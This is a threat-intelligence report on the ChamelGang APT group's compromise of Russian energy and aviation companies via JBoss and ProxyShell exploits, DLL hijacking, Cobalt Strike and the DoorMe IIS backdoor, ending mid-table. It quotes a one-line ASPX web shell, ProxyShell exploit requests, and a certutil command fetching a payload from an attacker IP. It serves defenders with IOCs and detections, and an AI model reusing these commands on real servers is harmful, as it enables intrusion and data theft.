Introduction
In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company’s network had been compromised by an unknown group for the purpose of data theft. We gave the group the name ChamelGang (from the word “chameleon”), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google. The attackers employed two methods. They acquired domains that imitate legitimate ones (newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com). In addition, the APT group placed SSL certificates that also imitated legitimate ones (github.com, www.ibm.com, jquery.com, update.microsoft-support.net) on its servers. To achieve their goal, the attackers used a trending penetration method—supply chain. The group compromised a subsidiary and penetrated the target company’s network through it.
After investigating the first incident, on August 16, 2021, as part of threat intelligence of the newly discovered group, PT ESC specialists detected another successful attack (server compromise), identified a new victim, and notified the affected organization. This time, the criminals attacked a Russian company from the aviation production sector, and used a chain of ProxyShell vulnerabilities for penetration.
To achieve their goals, the attackers used such well-known malicious programs as FRP, Cobalt Strike Beacon, and Tiny shell. They also used new, previously unknown malware (for example, ProxyT, BeaconLoader, and DoorMe backdoor).
Despite the fact that we managed to conduct two successful investigations, we could not unequivocally attribute the attackers to any of the known APT groups. We named the new group ChamelGang (from the word “chameleon”), since in both cases the group disguised its malware and network infrastructure under legitimate services of such companies as Microsoft, TrendMicro, McAfee, IBM, and Google.
CASE #1
1.1. Sequence of events
The reason for the investigation was the multiple triggering of the company’s antivirus products reporting the presence of Cobalt Strike Beacon in RAM.
1.2. Initial infection vector
At the end of March 2021, the attackers compromised a subsidiary organization to gain access to the energy company’s network, using a vulnerable version of a web application on the JBoss Application Server platform. The investigation revealed that the attackers, having exploited vulnerability CVE-2017-12149, were able to remotely execute commands on the host.
When analyzing the server logs, vuln6581362514513155613jboss records were found on the compromised host, indicating that the public exploit jboss-_CVE-2017-12149 had been used.
Also, the server.log logs contained all the command execution results. Note that the commands were those typically used for reconnaissance on hosts. The following one was the most noteworthy:
The dnslog.cn service generates a random third-level domain, which will later be used to obtain information about the availability of infected hosts. The infected device tries to allow this domain. In case of success, the computer gains Internet access, otherwise, it is located in a restricted access network. Below is an example of how the service works:
1.3. Lateral movement
To control the compromised host and perform reconnaissance on it, the attackers used the following tools:
-
- Single-line reverse shell:
It is able to:
-
-
- Receive a shell from an infected host,
- Execute a command,
- Transfer files.
-
To launch the malware with escalated privileges, the attackers used their own utility, which we called LinuxPrivilegeElevator.
Then the attackers managed to gain access to the Windows infrastructure of the subsidiary. As work directories, the attackers used:
- C:\Windows\Web;
- C:\Windows\System32\wbem;
- C:\Windows\System32\inetsrv;
- C:\Windows\Temp.
To gain persistence and escalate privileges on the infected hosts, the attackers used a rather old DLL Hijacking technique associated with the MSDTC service. MSDTC is a Windows service responsible for coordinating transactions between databases (SQL server) and web servers. For more information about this technique, see the article by Trend Micro’s experts.
After uploading the malicious BeaconLoader library (see «the Analysis of malware and tools section») and the encrypted Cobalt Strike Beacon dlang.dat to a work directory suitable for DLL Hijacking, the attackers restarted the MSDTC service. Due to their actions on the host, event 4111 was recorded in the Windows logs. At startup, the service tries to load the following three DLL files from C:\Windows\System32: oci.dll, SQLLib80.dll, and xa80.dll.
In a specific case, the BeaconLoader role is performed by the oci.dll library.
On another compromised host, the attackers employed the DLL Hijacking technique, but with a different service. In this case, the attackers uploaded a malicious library wlbsctrl.dll onto the host to the following folder: C:\Windows\System32. Then they restarted the IKEEXT service with the “sc stop ikeext” and “sc start ikeext” commands. The restarted service calls LoadLibraryExW and tries to load the library at C:\Windows\System32\wlbsctrl.dll.
The library wlbsctrl.dll is also BeaconLoader, and Cobalt Strike Beacon encrypted for it is stored in the file at C:\Windows\Temp\MpCmdRun.log.1.
During the investigation, different payload configurations were detected. The HTTPS Beacon was used for hosts with direct Internet access, and the SMB Beacon, for communication with hosts in isolated network segments.
About two weeks later, which we think to be rather fast, the attackers managed to compromise the parent company due to the fact that its network was connected to the subsidiary’s infrastructure. The attackers obtained the dictionary password of the local administrator on one of the servers in an isolated segment and gained access to the network via RDP.
After that, they conducted reconnaissance in the network using built-in system utilities:
- regsvr32.exe,
- cmd.exe,
- ipconfig.exe,
- taskmgr.exe,
- ping.exe,
- nltest.exe,
- netstat.exe,
- tasklist.exe,
- quser.exe,
- nslookup.exe.
To check the accessibility of control servers, the attackers used the Curl utility built into the Windows operating system and (or) their own ProxyTest utility (see «the Analysis of malware and tools section»). This utility is designed for checking the HTTP accessibility of a resource from remote computers.
Command examples:
- curl -i http://42.99.116.14
- curl -i https://jumper.funding-exchange.org
- proxyT.exe http://45.99.116.14
The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang. This utility allows connecting to a reverse proxy server. The attackers’ requests were routed using the socks5 plugin through the server address (45.91.24.73:8996) obtained from the configuration data.
Here is an example of a configuration file that was restored while analyzing the RAM dump of one of the infected hosts:
FRP was also used in attacks on government agencies in East Asia, as reported in the article by Avast’s researchers.
After studying the company’s network for about two months and gaining control over most of it (including critical servers and hosts in different network segments), attackers installed a malicious module on one of the IIS servers (in this case, the Exchange server), which turned out to be a DoorMe backdoor (see «the Analysis of malware and tools section») and worked in the context of the web server process w3wp.exe. We assume that this was done to reserve the management channel of the compromised infrastructure. This technique was described earlier in the article IIS Raid — Backdooring IIS Using Native Modules and used by the APT group OilRig. In early August 2021, at the Black Hat conference, ESET presented detailed information about the family of malicious IIS modules, which indicates the growing popularity of this technique among attackers.
In attacks, DoorMe was installed using the console command:
If the command is executed successfully, the module parameters are saved in the configuration file applicationhost.config.
Choosing the name FastCgiModule_64bit for the malicious module is also a method to counter forensics. The attackers disguised the new module as an existing legitimate module by adding the x64 bit capacity to the name.
At the same time, the official Microsoft website recommends to exclude some folders on Exchange servers from antivirus scanning for stable server operation. The folder %SystemRoot%\System32\Inetsrv containing IIS server web components, where DoorMe was located, also falls into this category. This folder was excluded from scanning by the antivirus used in the target company.
During the investigation, DoorMe was not detected by antivirus protection tools.
1.4. Data collection and exfiltration
The attackers collected data on the compromised hosts using certain masks:
After collecting the data, they placed it on web servers on the compromised network for further downloading them using the Wget utility.
CASE #2
2.1 Sequence of events
During threat intelligence of the ChamelGang group on August 16, 2021, PT ESC experts found fresh traces of server compromise in another company that became a victim of this group. This time, the criminals attacked an organization from the Russian aviation production sector. We notified the affected company on time—four days after the server was compromised—and, in cooperation with its employees, promptly eliminated the threat. In total, the attackers remained in the victim’s network for eight days, and two weeks passed from the moment of notification to the completion of the incident response and investigation. According to our data, the APT group did not expect that its backdoors would be detected so quickly, so it did not have time to develop the attack further.
2.2 Initial infection vector
To penetrate the victim’s infrastructure, the attackers exploited a chain of related vulnerabilities in Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) called ProxyShell. It first became known from a report presented at the the Black Hat conference on August 5, 2021 (the next day the researcher published a detailed article), after which various APT groups began to actively exploit this chain of vulnerabilities. The first POC scripts appeared on GitHub on August 13, 2021.
The stages of ProxyShell exploitation by ChamelGang are as follows:
- CVE-2021-34473—bypassing the ACL. The vulnerability allows attackers to specify the mailbox address through the request string in the EwsAutodiscoverProxyRequestHandler handler. This, in turn, grants them access to an arbitrary URL with NT AUTHORITY\SYSTEM rights.
17.08.2021 1:20:31 W3SVC1 – – POST /autodiscover/autodiscover.json @VICTIM.COM:444/autodiscover/autodiscover.xml?&Email=autodiscover/[email protected] 443 – 103.80.134.159 HTTP/1.1 ExchangeServicesClient/0.0.0.0 – – – 200 0 0 545
- CVE-2021-34523—privilege reduction. Since there is no mailbox for the user NT AUTHORITY\SYSTEM, at this stage, the attackers get a valid domain SID of the local administrator. In the future, the SID is used for the X-Rps-CAT parameter.
17.08.2021 1:20:34 W3SVC1 – – POST /autodiscover/autodiscover.json @VICTIM.COM:444/mapi/emsmdb/?&Email=autodiscover/[email protected] 443 – 103.80.134.159 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3497.81+Safari/537.36 – – – 200 0 0 587
- At this stage, attackers create a draft letter through the Exchange Web Service (EWS). The POST request passes a SOAP element with a draft message.
17.08.2021 1:20:41 W3SVC1 – – POST /autodiscover/autodiscover.json @VICTIM.COM:444/ews/Exchange.asmx?&Email=autodiscover/[email protected] 443 – 103.80.134.159 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/69.0.3497.81+Safari/537.36 – – – 200 0 0 623
- CVE-2021-31207—the ability to write to a file with subsequent remote code execution. Attackers use PowerShell cmdlets: New-ManagementRoleAssignment to get the role of importing and exporting mailboxes and New-MailboxExportRequest to export the mailbox to the web server directory.
17.08.2021 1:20:46 W3SVC1 – – POST /autodiscover/autodiscover.json @VICTIM.COM:444/PowerShell/?&X-Rps-CAT=[BASE64_REDACTED]&Email=autodiscover/autodiscover.json?@VICTIM 443 – 103.80.134.159 HTTP/1.1 Python+PSRP+Client – – – 200 0 0 1035
- Next, a mail PST file with the signature (magic) !BDN (0x21, 0x42, 0x44, 0x4E) and the .aspx extension is uploaded to the file system.
“New-MailboxExportRequest”, “-Mailbox \”Administrator\” -IncludeFolders (\”#Drafts#\”) -ContentFilter \”(Body -like ‘*468749030*’)\” -ExcludeDumpster \”True\” -FilePath \”\\\\127.0.0.1\\C$\\inetpub\\wwwroot\\aspnet_client\\468749030.aspx\” -Name \”468749030\””
- In the contents of the target file, after applying the permutation encoding NDB_CRYPT_PERMUTE , you can notice a single-line web shell.
script Language=”C#” runat=”server”>void Page_Load(object s, EventArgs e){System.IO.File.WriteAllText(Context.Request[“p”],Encoding.UTF8.GetString(Convert.FromBase64String(Context.Request[“c”])));} /script - Attackers send a GET request to the web shell.
17.08.2021 1:29:25 W3SVC1 – – GET /aspnet_client/468749030.aspx – 443 – 103.80.134.159 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.36 – – – 200 0 0 10415
After the successful installation of the web shell, the attackers downloaded functional web shells and began to conduct reconnaissance on the compromised node. To detect attempts to exploit the vulnerability chain in the logs of the IIS server, you can use publicly available YARA signatures (useful information about these vulnerabilities can be found in these materials).).
2.3 Lateral movement
The attackers exercised control over the infected nodes using ASPX web shells:
After gaining a foothold on the infected nodes, the attackers installed the backdoor DoorMe v2 (see the Analysis of malware and tools section) on two mail servers (Microsoft Exchange Server) on the victim’s network. Selection of the names of malicious libraries (modrpflt.dll, protsdown.dll) and the names of the IIS server modules (modrpflt, protsdown) was an attempt to disguise malware as legitimate libraries. To hide malicious files, the attackers also changed timestamps (Timestomp) and assigned them the values of legitimate files.
The attackers used a modified version of the DoorMe backdoor. Presumably, they modified the backdoor after its sample was uploaded to VirusTotal. As a result of the new obfuscation, most antivirus engines stopped detecting this malware.
An example of executing a command through the DoorMe backdoor in the IIS logs:
To move inside the network and infect user nodes, the attackers used BeaconLoader (see the Analysis of malware and tools). To launch it, the attackers used the previously described launch technique through the MSDTC service. After launching, this service loads the library oci.dll, which launches Cobalt Strike Beacon (dlang.dat).
3. Analysis of malware and tools
3.1. BeaconLoader and Cobalt Strike Beacon
As we have mentioned before, BeaconLoader is uploaded using DLL Hijacking. At the first stage, the library receives the addresses of the functions and libraries necessary for its operation. Then, it checks the name of the parent process and the privilege type (for further work, the SYSTEM type and names msdtc.exe, msdtc.exe.mui, and vmtoolsd.exe are required). These names are located inside the binary file in encrypted form, and their decryption occurs according to one and the same unusual scheme: each value is placed in a separate register, and after that each of the registers is separately added modulo 2 to a single-byte value and copied to the stack.
Also, note the use of direct native calls inside the library (Figure 15) to create a new thread if the process name is correct, as well as to work with memory.
Next, the library decrypts the name of the file with the payload (Figure 16) and then reads it. Note that the file itself must be located in the same directory as the library.
Then the main payload is decrypted. In the beginning, the first 16 bytes are separated from the file (highlighted in red in Figure 17)—these bytes will be the basis for preparing the decryption key.
Then comes the first stage of the decryption key preparation— one cycle of preparing the 16 separated bytes of the file. The procedure is as follows: each byte is added modulo 2 to the following value (see Figure 18 for the example for the first 6 bytes). Also, at some stages, the constants stored in registers are modified, on the basis of which the value of the encryption key can change at a specific stage.
After that, an MD5 hash is read from the received data. The resulting value will be the required encryption key.
The main payload is decrypted by the AES algorithm in CBC mode, with a 16-byte key obtained at the preparation stage and a zero (empty) initialization vector.
After decryption, the security attributes for the specified memory area are changed (via NtProtectVirtualMemory), after which control is transferred to them in a new thread.
In another version of BeaconLoader, which was uploaded using the IKEEXT service, many sections of the code are identical to the previous ones, but there are still many differences.
In the beginning, the process name is also checked—in this case, the process name should be svchost.exe. Next, the file C:\Windows\Temp\MpCmdRun.log.1 is read; as in the previous case, it contains a payload. The encryption scheme at the first stage is different from that in oci.dll: here, the first 4 bytes contain the key for XOR decryption of the remaining data. (The key is highlighted in red in Figure 20)
The decryption of the first stage does not include the modification of the encryption key at any of the stages and consists in a normal four-byte XOR.
The decrypted data has the following structure:
Note that the sizeOfDecryptedData value differs from the original file size by 41: two service fields and the encryption key are included here.
At the next stage, the initialization vector for the AES algorithm is formed. This value is obtained by MD5 hashing of the encryption key 741668454FFA04A95EBA720E1B74A5B3 (encryptionKey field), and after that the main payload is decrypted with these parameters in AES_CBC mode.
In both cases, Cobalt Strike Beacon was the payload, and in the case of oci.dll, the SMB Beacon was decrypted and launched, and in the second case, the HTTPS Beacon.
Investigating the first incident, we found two versions of Cobalt Strike Beacon: one for interaction over SMB, the other over HTTPS. The configurations of these two versions are shown below.
HTTPS Beacon
BeaconType | HTTPS |
Port | 443 |
PublicKey_MD5 | 5a178220c2514f49a16f0eb6d9dc2a37 |
C2Server | www.funding-exchange.org,/Home.aspx |
UserAgent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/17.17134 |
HttpPostUri | /BecomeMember.aspx Malleable_C2_Instructions – Remove 2365 bytes from the end Remove 824 bytes from the beginning Base64 URL-safe decode XOR mask w/ random key |
HttpGet_Metadata | ConstHeaders Accept: application/xhtml+xml;q=0.9,*/*;q=0.8 Host: www.thefundingexchange.com Accept-Encoding: gzip, deflate DNT: 1 Cache-Control: max-age=0 Metadata base64url prepend “check=true;ASP.NET_SessionId=” header “Cookie” |
HttpPost_Metadata | ConstHeaders Accept: application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Host: www.thefundingexchange.com Accept-Encoding: gzip, deflate DNT: 1 Cache-Control: max-age=0 SessionId mask base64url parameter “_s_token” Output mask base64url |
SSH_Banner | Host: www.funding-exchange.org |
Watermark | 1936770133 |
HostHeader | Host:www.funding-exchange.org |
SMB Beacon
BeaconType | SMB |
Port | 4444 |
PublicKey_MD5 | 5a178220c2514f49a16f0eb6d9dc2a37 |
PipeName | \\.\pipe\Winsock2\CatalogChangeListener98df |
Watermark | 1936770133 |
Both versions have the same Watermark 1936770133, which we did not notice in other attacks.
When accessing the C2 server www.funding-exchange[.]org, the user is redirected to the website thefundingexchange[.]com. However, we did not notice any malicious activity on this site.
3.2. BeaconLoader and Cobalt Strike Beacon v2
During the investigation of the second incident, two versions of the Cobalt Strike Beacon were discovered—their configurations are shown below.
BeaconType | HTTPS |
Port | 443 |
PublicKey_MD5 | d4ec8d5e82af77b8488abd5264aedf02 |
C2Server | static.mhysl.org,/images/L._SX2_.jpg |
UserAgent | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
HttpPostUri | /action/view.aspx |
Watermark | 1028153346 |
BeaconType | Hybrid HTTP DNS |
Port | 1 |
PublicKey_MD5 | d4ec8d5e82af77b8488abd5264aedf02 |
C2Server | snn2.mhysl.org,/images/button_5x5.jpg,snn1.mhysl.org,/images/L._SX2_.jpg,snn3.mhysl.org,/images/button_5x5.jpg |
UserAgent | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
HttpPostUri | /action/update.aspx |
Watermark | 1028153346 |
Watermark 1028153346 is unique and has not been previously found in publicly available sources.
3.3. ProxyT
The application is designed to check whether there is a connection to a remote URL. The URL address is passed to the program as a parameter, after which the program divides it into components by calling InternetCrackUrlA. If this cannot be done, the program ends, and “Error on InternetCrackUrl: error_code” is displayed in the console.
Next, an attempt is made to create a connection descriptor (InternetOpenA; in case of an error, the console shows: “Error On InternetOpen: error_code”) and initialize the connection (InternetConnectA; similarly, either “Error On InternetConnect: error_code” or “Error On INTERNET_SCHEME: error_code” will be displayed).
Next, a GET request is formed and sent to the server. In case of an error, its code is also displayed in the console (Figure 25).
The HttpQueryInfoA function with the HTTP_QUERY_RAW_HEADERS_CRLF parameter is responsible for getting headers from the server response. This parameter means that all server response headers will be returned, and each of the headers will be separated by a carriage return character.
After receiving the headers, all of them are output to the console (fnPrintToConsole_fromReg function).
3.4. DoorMe backdoor
Among the malware samples we found during the incident investigation, the DoorMe backdoor is the most interesting. Basically, it is a native IIS module that is registered as a filter through which HTTP requests and responses are processed.
The file has two entry points: the main one, which does not have any set of functions, and the second one—RegisterModule, which is required for registering the native module—it initializes an instance of the DoorMe class. The name alludes to backdoor functionality. We did not find any mention of a similar backdoor in public sources.
The original code has the same debugging lines as in the backdoor we found, which indicates that certain handlers were not implemented in the backdoor:
The module creates its own handler for the OnGlobalPreBeginRequest event, which is launched before processing a request received on the web interface of a web application on IIS.
The handler is obfuscated; almost all strings are encrypted with XOR, which complicates its analysis.
The logic of the handler is as follows:
-
- 1. The module determines which phrase will open the main set of backdoor functions. This phrase is set in the registry at HKEY_CLASSES_ROOT\\.zip\\config. If the key is not in the registry, the default “fuckme” phrase is used..
-
- 2. The incoming HTTP request is expected to contain the IISSessions cookie with the MD5(key) value. In this case, the MD5 is from fuckme, that is, 79cfdd0e92b120faadd7eb253eb800d0. If this condition is not met, the function will not interfere with the request processing.
- 3. If the request method is GET, the function returns the string <html><body><h1>It works!</h1></body></html>. This is an indicator for the attacker that the backdoor is really installed and functioning.
- 4. If the request method is POST, the content of the received POST request to be encrypted using AES. The key is MD5—the first half of MD5(source_key).
In total, there are six different commands that this backdoor can receive. The separator between the command and its argument is the pipe symbol: |
Command | Value |
0 | Return the current directory, username, and hostname |
1 | Run an arbitrary command by cmd.exe /c <command> |
2 | Run an arbitrary command by creating a new process |
3 | Write a file |
4 | Another way to write a file |
5 | Copy the timestamps from file A to file B |
The results of the command execution are returned in encrypted form.
3.5. DoorMe backdoor v2
When investigating the second incident, we found an expanded version of this backdoor: the obfuscation has changed, and new commands have appeared. However, the name of the class containing overridden methods that implement a set of backdoor functions remains the same—DoorMe.
To complicate the analysis, control flow obfuscation with a dispatcher is used:
Some of the sensitive strings of this backdoor now are in cleartext, and some others are subject to the following obfuscation scheme:
Looking carefully at the values x[i] and y[i], you can see that they are the inverse of each other. Thus, the final formula for each byte can be simplified:
Interestingly, this formula comes down to two XORs, and given the fact that the code uses the same pairs of x and z, we can say that the generator of these strings is even simpler than it could be.
Unlike IDA Pro, Ghidra simplifies these equations, although it does not cope with all of them:
In addition, a technique is used that “breaks” IDA Pro: it incorrectly splits the function, which causes some nodes of the graph to disappear from the decompiler.
The IDAPython script solves this problem:
Compared to the previous version, the number of commands has increased to eleven:
Command | Value |
0 | Return the current directory, username, and hostname |
1 | Run an arbitrary command by cmd.exe /c <command> |
2 | Run an arbitrary command by creating a new process |
3 | Write a file |
4 | Another way to write a file |
5 | Copy the timestamps from file A to file B |
6 | Return the current working directory of the application |
7 | Another way to return the current working directory of the application |
8 | Get information about the contents in the selected directory, pass the file type, its size, the date of the last change, and the name in the form of a table: Size Type Last Modified Name |
9 | Get a list of processes in the form of a table: PID PPID Arch Name User |
A | Terminate and delete the specified process |
4. Network infrastructure
When creating the network infrastructure, the attackers tried to disguise themselves as legitimate services as much as possible. The attackers registered phishing domains that imitate legitimate services of Microsoft, TrendMicro, McAfee, IBM and Google, including their support services, content delivery (cdn), and updates. Here are a number of discovered domains: newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com. The APT group also placed SSL certificates on its servers, which also imitated legitimate ones: github.com, www.ibm.com, jquery.com, update.microsoft-support.net.
Information about phishing certificates:
Issuer | C=US, ST=, L=, O=jQuery, OU=Certificate Authority, CN=jquery.com |
Serial number | 0x368b8e88 |
Fingerprint | bc9e9df8738709223e53d27ba1872f06
0845d108fbd0860bbbc0df0f4de96f41a93ff0f0 e3cdf05b9afa03b16971b4140afed4100408d6e48d18c9b5d5957e380ba3f33f |
JARM | 07d14d16d21d21d07c42d41d00041d58c7162162b6a603d3d90a2b76865b53 |
Issuer | C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com |
Serial number | 0x4405609c |
Fingerprint | b2422d23e2d59a5807216301802f19d8
7ad381d016d138198c4bd5b89a74f0e3c6e2e786 137c4635ede8d21050026ca2c26cae1c954955b44e285d68d17d3c11174983cb |
JARM | 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 |
Issuer | C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com |
Serial number | 0x316b328c |
Fingerprint | d4916d7a18357716753c1e6431d5c160
4df235e385a510639da6aebb325962d0fc2345fc 3da87b067a687d95a5f37f28af20c325227e158a026c442aaa20b91159e6d161 |
JARM | 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 |
Issuer | C=US, ST=Armonk, L=New York, O=IBM, OU=IBM, CN=www.ibm.com |
Serial number | 0xfdc788a9c57394e4 |
Fingerprint | 155a73dffb275fbf3c4266720fcc97a2
3fc1b7d5168a01e4aba2fcfc9513f40346e9a52b cca094b19f51b00ded930cfffe35ce616e89efe7863f3ff1812474ee5e827619 |
JARM | 2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53 |
Issuer | C=US, ST=Redmond, L=Washington, O=Microsoft Corporation, OU=Microsoft IT, CN=catalog.update.microsoft.com |
Serial number | 0x3c3ca23b |
Fingerprint | 98742ed94fa10befdae2103164d3dfd1
bf8fc252ca92408b1a7b418a70f8545eeabe8782 52897cdfeca4452ac76a3f89fb05118c999fb707959a789f37b235275a5fdd9d |
JARM | – |
Issuer | C=US, ST=Redmond, L=Washington, O=Microsoft Corporation, OU=Microsoft IT, CN=catalog.update.microsoft.com |
Serial number | 0x28fc9f85 |
Fingerprint | 6b493427de4740d212393e6fc54ba643
28089297e1fe2a9f1a32988184e426c2d030426c 1c3edb30e6528c9c6381a8e9d988de1dc299b26aee0d0ff54597a279d269723d |
JARM | – |
Issuer | C=US, ST=Redmond, L=Washington, O=localhost, OU=localhost, CN=www.localhost.com |
Serial number | 0x6e355c4e |
Fingerprint | baf951e0202ba599512484e3a49dabe6
5188a5381ea927ed46bffd59ad78c6ef8cc564df a49251716b1f5b88281fd688c8350fe35fa7e922e34ab39e3bf1d96db5f6374e |
JARM | 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261 |
Issuer | C=US, ST=Redmond, L=Washington, O=localhost, OU=localhost, CN=www.localhost.com |
Serial number | 0x40ff5bd3 |
Fingerprint | 6f9d1ed42dadcca5ebc66ae0418d00d1
3ec7e6bbe95c46752bf7ee7e2edfa4425824bbde 02e767c8752b0ddd3b2203f26b09063cdc3a1d83b3a9d493f433f106074c2120 |
JARM | 07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 |
The data obtained via JARM suggests that the attackers use the Cobalt Strike framework on servers connected to the network infrastructure. During the attack, the group also used Beacon (from the Cobalt Strike framework) as the main payload. This fact further bolsters our assumption that this network infrastructure was created by the same attackers.
JARM
|
Service
|
Source |
07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 | Cobalt Strike | https://github.com/cedowens/C2-JARM |
07d14d16d21d21d07c42d41d00041d58c7162162b6a603d3d90a2b76865b53 | Cobalt Strike | https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/ |
2ad2ad16d2ad2ad22c42d42d00042d58c7162162b6a603d3d90a2b76865b53 | Cobalt Strike | https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 |
2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261 | python3 http.server | https://github.com/cedowens/C2-JARM |
The attackers’ servers were mainly located on several subnets:
- 154.210.12.0/24
- 194.113.172.0/24
- 45.131.25.0/24
- 45.158.35.0/24
- 45.195.1.0/24
- 45.91.24.0/24
According to WHOIS data and SOA records of some of the domains, we managed to obtain email addresses with which they were registered or used as contact addresses. Note that for this purpose, the attackers used the ProtonMail mail service with built-in encryption.
Domain
|
|
newtrendmicro[.]com | [email protected] |
microsoft-support[.]net | [email protected] |
mcafee-upgrade[.]com | [email protected] |
microsofed[.]com
cdn-chrome[.]com |
[email protected] |
To complicate the analysis of the network infrastructure, the attackers hid the IP addresses of their domains behind CloudFlare.
5. Victims
In addition to two organizations in Russia (fuel and energy and aviation production companies) during further threat intelligence of the group activity, we identified 13 more compromised organizations in ten countries of the world: the United States, Japan, Turkey, Taiwan, Vietnam, India, Afghanistan, Lithuania and Nepal. In particular, compromised government servers were found in the last four. Microsoft Exchange Server was located on almost all compromised nodes. In all likelihood, the nodes were compromised using vulnerabilities such as ProxyLogon and ProxyShell. All the victims were notified by the national CERTs.
Conclusions
Trusted relationship attacks are rare today due to the complexity of their execution. Using this method in the first case, the ChamelGang group was able to achieve its goal and steal data from the compromised network. Also, the group tried to disguise its activity as legitimate, using OS features and plausible phishing domains. In addition, the attackers left a passive backdoor DoorMe in the form of a module for the IIS server. During further investigation of the activity of the ChamelGang group, we found compromised government servers in five countries. Also, attackers began to actively exploit the ProxyShell vulnerability. The increase in the number of cases of its exploitation has been confirmed by FireEye’s recent study. If large companies do not build a structured process and timely respond to the emergence of new threats, they will continue to fall victim to various APT groups that quickly adopt new methods of attacks, including those described in this report.
We predict that the trend using the supply chain method will continue. New APT groups using this method to achieve their goals will appear on stage.
Authors: Aleksandr Grigorian, Daniil Koloskov, Denis Kuvshinov, Stanislav Rakovsky, Positive Technologies
The article’s authors thank the incident response and threat intelligence teams PT Expert Security Center for their help in drafting the story.
Verdicts of our products
PT Sandbox
- tool_linux_ZZ_LinuxPrivilegeElevator__Trojan
- tool_linux_ZZ_tsh__Backdoor__Opensource__Tool
- tool_mem_ZZ_CobaltStrike__Backdoor__Strings
- tool_mem_ZZ_CobaltStrike__Backdoor__x64Beacon
- tool_mem_ZZ_FRP__RiskTool
- tool_multi_ZZ_FRP__RiskTool
- tool_win_ZZ_CobaltStrike__Dropper__x64SideloadingLibrary
- tool_win_ZZ_proxyT__HackTool
- tool_win64_ZZ_Doorme__Backdoor__IIS__Native__Module
- Backdoor.Win32.CobaltStrike.a
- Trojan.Win32.Generic.a
PT Network Attack Discovery
- REMOTE [PTsecurity] Possible Cobalt Strike
sid: 10006705; - REMOTE [PTsecurity] Cobalt Strike
sid: 10006706; - REMOTE [PTsecurity] Possible Cobalt Strike
sid: 10006707;
PT MaxPatrol SIEM
- Application_Whitelisting_Bypass_through_rundll32
- Detect_Possible_IIS_Native_Module_Installation
Recommendations
- Regularly install security updates (in particular, to eliminate such vulnerabilities as ProxyLogon and ProxyShell).
- Use only the latest OS and software versions.
- Check the configuration file %windir%\system32\inetsrv\config\ApplicationHost.config for malicious (or suspicious) modules.
- Track the execution of commands of the parent process w3wp.exe in the system (OWA service) and the launch of the console utility AppCmd.exe.
- Use indicators of compromise (see the IOCs section) to search for infected servers.
MITRE TTPs
ID |
Name |
Description |
Resource Development |
||
T1583.001 |
Domains |
The attackers obtained domains that imitated legitimate ones. Examples: newtrendmicro.com, centralgoogle.com, microsoft-support.net, cdn-chrome.com, mcafee-upgrade.com, centralgoogle.com |
T1587.001 |
Malware |
The attackers developed their own malware to carry out the attack. Examples: DoorMe backdoor, ProxyTest |
T1588.002 |
Tool |
The attackers used the public Cobalt Strike tool, which requires a paid license to work with. Examples: Watermark – 1936770133 |
T1588.004 |
Digital Certificates |
The attackers placed their own SSL certificates, which imitated legitimate ones. Examples: github.com, www.ibm.com, jquery.com, update.microsoft-support.net |
Initial Access |
||
T1199 |
Trusted Relationship |
The group compromised a subsidiary and penetrated the target company’s network through it |
T1190 |
Exploit Public-Facing Application |
The attackers used a public exploit to gain access to the infrastructure connected to the infrastructure of the target organization. Examples: CVE-2017-12149, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 |
Execution |
||
T1047 |
Windows Management Instrumentation |
The attackers used the wmic utility to execute commands on the hosts. Examples: C:\Windows\system32\cmd.exe /C wmic /node:”host” process call create “c:\windows\system32\cmd.exe /c certutil -urlcache -f -split http://42.99.116[.]14/ c:\windows\temp\MpKsl15169faf > c:\windows\temp\_1622775917806 2>&1” |
T1059.003 |
Windows Command Shell |
The attackers used the command interpreter “cmd.exe /c” to execute commands on the hosts. Examples: cmd.exe /C copy hosts.bak c:\windows\system32\drivers\etc\hosts |
Persistence |
||
T1505.003 |
Web Shell |
The attackers used various web shells, as well as the native module of the IIS server to manage the infected hosts. Examples: c:\windows\system32\inetsrv\appcmd.exe install module /name:FastCgiModule_en64bit /image:%windir%\System32\inetsrv\iisfcgix64.dll |
T1574.001 |
DLL Search Order Hijacking |
The attackers used the appropriate technique to execute the payload. Examples: oci.dll, wlbsctrl.dll |
Privilege Escalation |
||
T1068 |
Exploitation for Privilege Escalation |
The attackers used exploits to escalate privileges on the available hosts. Examples: EternalBlue |
Defense Evasion |
||
T1036.003 |
Masquerading: Rename System Utilities |
